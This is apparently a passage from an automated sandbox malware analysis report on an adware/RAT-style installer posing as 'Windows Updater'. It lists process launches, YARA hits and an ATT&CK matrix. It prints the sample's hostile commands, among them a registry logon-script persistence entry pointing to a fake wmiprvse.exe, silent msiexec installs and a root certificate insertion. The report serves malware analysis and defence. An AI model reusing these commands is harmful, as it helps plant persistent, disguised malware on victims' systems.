                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A56CC2B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_6A56CC2B
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A571D33 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_6A571D33
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D816E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_000D816E
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D87D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000D87D0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D8963 SetUnhandledExceptionFilter,28_2_000D8963
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000DCDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000DCDA3
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0056816E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0056816E
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005687D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_005687D0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00568963 SetUnhandledExceptionFilter,31_2_00568963
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0056CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0056CDA3
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* C:\ProgramDataJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /fJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe "C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe"
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\aw manager\windows manager 1.0.0\install\97fdf62\windows manager - postback johan.msi" /qn campaign=2598 ai_setupexepath=c:\users\user\appdata\local\temp\is-53us7.tmp\a1.exe setupexedir=c:\users\user\appdata\local\temp\is-53us7.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1701869374 /qn campaign=""2598"" " campaign="2598
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\appdata\roaming\advancedwindowsmanager\windows installer 5.0.3\install\7eb1504\system updater.msi" ai_setupexepath="c:\programdata\aw manager\windows manager\updates\v113\v113.exe" setupexedir="c:\programdata\aw manager\windows manager\updates\v113\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1701869374 "
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\aw manager\windows manager 1.0.0\install\97fdf62\windows manager - postback johan.msi" /qn campaign=2598 ai_setupexepath=c:\users\user\appdata\local\temp\is-53us7.tmp\a1.exe setupexedir=c:\users\user\appdata\local\temp\is-53us7.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1701869374 /qn campaign=""2598"" " campaign="2598
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\appdata\roaming\advancedwindowsmanager\windows installer 5.0.3\install\7eb1504\system updater.msi" ai_setupexepath="c:\programdata\aw manager\windows manager\updates\v113\v113.exe" setupexedir="c:\programdata\aw manager\windows manager\updates\v113\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1701869374 "
                                  Source: a3.exe.4.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_100268A5 cpuid 4_2_100268A5
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: GetLocaleInfoA,4_2_100212D9
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,4_2_100217F3
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_10017808
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: GetLocaleInfoA,4_2_10023160
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _LcidFromHexString,GetLocaleInfoA,4_2_100213BB
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,4_2_100263ED
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,4_2_10020BF4
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_10026428
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,4_2_10020434
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_10021451
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_10026565
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_10020598
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_10021693
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_10021752
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_100217B7
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,20_2_002DBB80
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: EnumSystemLocalesW,20_2_6A586A67
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_6A586AF2
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: EnumSystemLocalesW,20_2_6A5869CC
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: EnumSystemLocalesW,20_2_6A57E98E
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: EnumSystemLocalesW,20_2_6A586981
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,20_2_6A57EE57
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,20_2_6A54CE40
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_6A586E6E
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,20_2_6A586F74
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetLocaleInfoW,20_2_6A586D45
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_6A587043
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_6A5866DF
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,28_2_000F1D1C
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: EnumSystemLocalesW,28_2_000F1FBE
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: EnumSystemLocalesW,28_2_000F2009
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: EnumSystemLocalesW,28_2_000F20A4
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_000F212F
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,28_2_000F2382
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_000F24AB
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,28_2_000F25B1
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_000F2680
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,28_2_0006ABB0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: EnumSystemLocalesW,28_2_000EB74A
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: GetLocaleInfoW,28_2_000EBBF4
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: EnumSystemLocalesW,31_2_00582009
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: EnumSystemLocalesW,31_2_005820A4
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_0058212F
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,31_2_00582382
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_005824AB
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,31_2_005825B1
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_00582680
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,31_2_004FABB0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: EnumSystemLocalesW,31_2_0057B74A
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetLocaleInfoW,31_2_0057BBF4
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,31_2_00581D1C
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: EnumSystemLocalesW,31_2_00581FBE
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F05F0 CreateNamedPipeW,CreateFileW,20_2_002F05F0
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001F38D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_1001F38D
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10016F7F RtlAllocateHeap,GetVersionExA,HeapFree,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,4_2_10016F7F
                                  Source: C:\Windows\SysWOW64\expand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: dump.pcap, type: PCAP

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.6bea0000.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.0.wmiprvse.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.6bf00000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.6f900000.7.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.6f8e0000.6.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.4543369015.0000000000402000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.4545412473.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000000.2226521290.0000000000402000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: expand.exe PID: 5696, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: wmiprvse.exe PID: 6024, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\5d7fc0667d8a0e48a42ebd70bdd0c76a.tmp, type: DROPPED
                                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                                  1
                                  Replication Through Removable Media
                                  31
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  2
                                  Disable or Modify Tools
                                  OS Credential Dumping1
                                  System Time Discovery
                                  1
                                  Replication Through Removable Media
                                  1
                                  Archive Collected Data
                                  Exfiltration Over Other Network Medium12
                                  Ingress Tool Transfer
                                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                                  Default Accounts1
                                  Native API
                                  11
                                  Registry Run Keys / Startup Folder
                                  13
                                  Process Injection
                                  11
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory11
                                  Peripheral Device Discovery
                                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
                                  Encrypted Channel
                                  SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                                  Domain Accounts113
                                  Command and Scripting Interpreter
                                  Logon Script (Windows)11
                                  Registry Run Keys / Startup Folder
                                  3
                                  Obfuscated Files or Information
                                  Security Account Manager4
                                  File and Directory Discovery
                                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                                  Non-Standard Port
                                  Data Encrypted for ImpactDNS ServerEmail Addresses
                                  Local AccountsCronLogin HookLogin Hook1
                                  Software Packing
                                  NTDS58
                                  System Information Discovery
                                  Distributed Component Object ModelInput CaptureTraffic Duplication3
                                  Non-Application Layer Protocol
                                  Data DestructionVirtual Private ServerEmployee Names
                                  Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  Timestomp
                                  LSA Secrets1
                                  Query Registry
                                  SSHKeyloggingScheduled Transfer14
                                  Application Layer Protocol
                                  Data Encrypted for ImpactServerGather Victim Network Information
                                  Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  DLL Side-Loading
                                  Cached Domain Credentials361
                                  Security Software Discovery
                                  VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                                  External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  File Deletion
                                  DCSync12
                                  Virtualization/Sandbox Evasion
                                  Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                                  Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job32
                                  Masquerading
                                  Proc Filesystem3
                                  Process Discovery
                                  Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                                  Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                  Modify Registry
                                  /etc/passwd and /etc/shadow1
                                  Application Window Discovery
                                  Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                                  Supply Chain CompromisePowerShellCronCron12
                                  Virtualization/Sandbox Evasion
                                  Network Sniffing2
                                  System Owner/User Discovery
                                  Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                                  Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                                  Process Injection
                                  Input Capture1
                                  System Network Configuration Discovery
                                  Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
